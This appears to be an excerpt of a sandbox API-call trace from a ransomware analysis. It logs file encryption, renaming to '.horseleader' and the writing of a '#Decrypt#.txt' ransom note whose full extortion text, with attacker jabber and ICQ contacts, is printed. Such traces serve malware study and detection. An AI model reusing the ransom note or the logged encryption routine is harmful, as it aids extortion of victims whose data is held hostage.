-1 [0247.910] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0247.910] StrStrIW (lpFirst="SKY.INF", lpSrch=".horseleader") returned 0x0 [0247.910] lstrcmpW (lpString1="SKY.INF", lpString2="#Decrypt#.txt") returned 1 [0247.910] lstrcmpW (lpString1="SKY.INF", lpString2="_uninstalling_.png") returned 1 [0247.910] lstrlenW (lpString=".testttjffg") returned 11 [0247.910] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF", lpSrch=".testttjffg") returned 0x0 [0247.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0247.911] StrStrW (lpFirst="SKY.INF", lpSrch=".txt") returned 0x0 [0247.911] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=444) returned 1 [0247.911] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1bc, lpOverlapped=0x0) returned 1 [0247.913] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.913] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1bc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1bc, lpOverlapped=0x0) returned 1 [0247.913] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.913] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.913] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.914] CloseHandle (hObject=0x1a4) returned 1 [0247.914] GetProcessHeap () returned 0x780000 [0247.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.914] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF.horseleader") returned 83 [0247.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf.horseleader")) returned 1 [0247.917] GetProcessHeap () returned 0x780000 [0247.917] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.917] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7279, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.917] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.917] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 [0247.917] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.917] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.917] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.918] lstrlenW (lpString=".testttjffg") returned 11 [0247.918] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.918] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.918] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 [0247.919] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.919] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=29305) returned 1 [0247.919] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.922] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.922] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2279, lpOverlapped=0x0) returned 1 [0247.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.922] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2279, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2279, lpOverlapped=0x0) returned 1 [0247.923] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.923] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.923] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.923] CloseHandle (hObject=0x1a4) returned 1 [0247.923] GetProcessHeap () returned 0x780000 [0247.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.923] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.horseleader") returned 88 [0247.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.horseleader")) returned 1 [0247.924] GetProcessHeap () returned 0x780000 [0247.924] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.924] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7279, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.924] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.924] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\#Decrypt#.txt") returned 77 [0247.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.925] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.925] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.927] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.927] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.927] CloseHandle (hObject=0x158) returned 1 [0247.927] GetProcessHeap () returned 0x780000 [0247.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.927] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SLATE", cAlternateFileName="")) returned 1 [0247.927] lstrcmpiW (lpString1="SLATE", lpString2="Windows") returned -1 [0247.927] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned 65 [0247.927] lstrcmpW (lpString1="SLATE", lpString2=".") returned 1 [0247.927] lstrcmpW (lpString1="SLATE", lpString2="..") returned 1 [0247.927] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.927] GetProcessHeap () returned 0x780000 [0247.927] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.927] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*") returned 67 [0247.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.932] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.932] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\.") returned 67 [0247.932] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.932] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.932] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\..") returned 68 [0247.932] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.932] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.932] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.933] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 77 [0247.933] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.933] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.933] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.933] lstrlenW (lpString=".testttjffg") returned 11 [0247.933] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.933] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.933] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 77 [0247.948] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.948] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1009) returned 1 [0247.949] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3f1, lpOverlapped=0x0) returned 1 [0247.951] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.951] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3f1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3f1, lpOverlapped=0x0) returned 1 [0247.951] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.951] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.952] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.952] CloseHandle (hObject=0x1a4) returned 1 [0247.952] GetProcessHeap () returned 0x780000 [0247.952] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.952] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.horseleader") returned 89 [0247.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.horseleader")) returned 1 [0247.953] GetProcessHeap () returned 0x780000 [0247.953] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.953] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27222c00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x27222c00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SLATE.ELM", cAlternateFileName="")) returned 1 [0247.954] lstrcmpiW (lpString1="SLATE.ELM", lpString2="Windows") returned -1 [0247.954] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM") returned 75 [0247.954] StrStrIW (lpFirst="SLATE.ELM", lpSrch=".horseleader") returned 0x0 [0247.954] lstrcmpW (lpString1="SLATE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.954] lstrcmpW (lpString1="SLATE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.954] lstrlenW (lpString=".testttjffg") returned 11 [0247.954] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.954] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.954] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM") returned 75 [0247.955] StrStrW (lpFirst="SLATE.ELM", lpSrch=".txt") returned 0x0 [0247.955] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=85056) returned 1 [0247.955] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.955] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.958] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 